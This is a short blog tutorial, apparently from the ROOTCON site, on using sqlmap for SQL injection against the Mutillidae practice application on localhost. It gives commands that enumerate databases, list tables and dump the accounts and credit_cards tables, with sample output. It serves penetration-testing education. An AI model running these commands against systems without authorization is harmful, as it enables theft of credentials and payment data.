SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.
To check all the attributes and options for this tool type sqlmap -h on your terminal.
Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:
$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs
After that we should be able to see the back-end DBMS, web server, and most importantly the databases.
Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] information_schema
[*] mysql
[*] owasp10
Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.
$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables
Tables enumerated:
+------------------------+
| accounts
| blogs_table
| captured_data
| credit_cards
| hitlog
| pen_test_tools
+-------------------------+
Now let's try to dump all the columns for the accounts table:
$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump
Right, we got columns cid, mysignature, password and username =)
Similar query: Select * from accounts;
Now's let's try dumping the credit_cards table:
$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump
Similar query: Select * from credit_cards;
Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.
About the Contributor:
Shipcode
is a prolific blogger of ROOTCON and at the same time an InfoSec
enthusiast from Cebu. He was inspired to join ROOTCON as part of the
core team to share his knowledge in information security. He encourages
other like minded individuals to come forward and share their knowledge
through blogging right here at ROOTCON Blog section.
ROOTCON is managed by like minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.